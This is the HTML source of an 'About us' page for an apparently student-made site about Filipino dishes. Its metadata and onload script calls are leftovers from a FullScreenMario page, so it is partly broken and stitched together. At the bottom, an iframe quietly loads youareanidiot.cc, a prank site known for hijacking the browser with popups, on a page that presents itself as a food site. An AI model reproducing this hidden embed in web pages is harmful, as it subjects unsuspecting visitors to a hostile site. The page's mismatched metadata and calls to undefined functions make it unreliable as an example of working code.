<!DOCTYPE HTML>
<html lang="en-us">
    <head>
        <meta charset="utf-8" />
        <title>About us</title>
        <meta name="keywords" content="fullscreenmario, full, screen, mario, javascript, html5, gaming, online, online game, fun, distraction" />
        <meta name="description" content="FullScreenMario is a free HTML5 remake of Nintendo's original Super Mario Bros. Play it here!" />

        <!-- build:css index.min.css -->
        <link href="index.css" rel="stylesheet" />
        <!-- /build -->
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>
        <link rel="shortcut icon" href="Theme/Mario.gif">
    </head>
<style type="text/css">
    .main{
        width: 100%;
        background-image: url("authentic filipino dishes.png");
        background-position: center;
        background-size: cover;
        height: 109vh;
    }
    .navbar{
        width: 1200px;
        height: 75px;
        margin:  auto;
    }
    .icon{
        width: auto;
        float: left;
        height: auto;
    }
    .logo{
        color: white;
        font-size: 35px;
        font-family: Arial;
        padding-left: auto;
        float: left;
        padding-top: auto;
    }
    .menu{
        width: 400px;
        float: left;
        height: 70px;

    }   
    ul{
        float: left;
        display: flex;
        justify-content: center;
        align-items: center;
    }
    ul li{
        list-style: none;
        margin-left: 52px;
        margin-top: 27px;
        font-size: 20px;
  color: White;
    background: #3a3b3c;

    }

    ul li a{
        text-decoration: none;
        color: #fff;
        font-family: Arial;



    }
 table {
    display: inline-block;
    color: black;
    text-transform: uppercase;
    font-family: Arial;
    border: 1px solid White;
    display: inline-block;

    color: black;
    text-transform: uppercase;
    letter-spacing: 4px;
    text-decoration: none;
    font-size: 15px;
    overflow: hidden;
    transition: 0.2s;
    color: White;
    background: #3a3b3c;
    font-family: Segoe UI;
    border-collapse: collapse;
}
body {
    background: #18191a;
    size: 150%}
input {
    display: inline-block;
    color: black;
    font-family: Arial;
    border: 1px solid White;
    display: inline-block;
    color: black;
    letter-spacing: 4px;
    text-decoration: none;
    font-size: 15px;
    overflow: hidden;
    transition: 0.2s;
    color: White;
    background: #242526;
    font-family: Segoe UI;
    text-decoration: none;
    cursor: pointer;
}
iframe {
    display: inline-block;
    color: black;
    font-family: Arial;
    border: 1px solid White;
    display: inline-block;
    color: black;
    letter-spacing: 4px;
    text-decoration: none;
    font-size: 15px;
    overflow: hidden;
    transition: 0.2s;
    color: White;
    background: #242526;
    font-family: Segoe UI;
    text-decoration: none;
    cursor: pointer;
     background-position: center;
        background-size: cover;
        height: 109vh;
          width: 100%;
}
html, body {
    height: 100%;
}

html {
    display: table;
    margin: auto;
}

body {
    display: table-cell;
    vertical-align: middle;
}

#imageUpload
{
    display: none;
}

#profileImage
{
    cursor: pointer;
}

#profile-container {
    width: 150px;
    height: 150px;
    overflow: hidden;
    -webkit-border-radius: 50%;
    -moz-border-radius: 50%;
    -ms-border-radius: 50%;
    -o-border-radius: 50%;
    border-radius: 50%;
}

#profile-container img {
    width: 150px;
    height: 150px;
}

</style>
   <body onload="setup(); setInterval('draw();',30);">

        <div class= "main">
    <div class="navbar">
        <table>
        <div class="icon">
            <tr>
            <td><h1 class="logo">Given-kun's:
        <b>"Authentic Filipino or Dishes"</b></h1></td></tr>
        </div>
        <tr>
        <td>
        <div class="menu">
        
            <ul>
                <li><a href="index.html">HOME</a></li>
                    <li><a href="index (2).html">ABOUT US</a></li>
                
                    <li><a href="gallery.html">GALLERY</a></li>
                    <li><a href="reference.html">REFERNCES</a></li>             
                    <li><a href="contact.html">CONTACT US</a></li>
            </ul>
    </td>
</tr>
        </div>
</table>
    </div>
    <H1>ABOUT US</H1>
    <iframe src="https://givenvalenzuela23.wixsite.com/website-2" onload="setup(); setInterval('draw();',30);"></iframe>
</div>

<script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.10.2/dist/umd/popper.min.js" integrity="sha384-7+zCNj/IqJ95wo16oMtfsKbZ9ccEh31eOz1HGyDuCQ6wgnyJNSYdrPa03rtR1zdB" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.min.js" integrity="sha384-QJHtvGhmr9XOIpI6YVutG+2QOK9T+ZnN4kzFN1RtK3zEFEIsxhlmWl5/YESvpZ13" crossorigin="anonymous"></script>
        <iframe src="https://youareanidiot.cc"></iframe>
    </body>
</html>
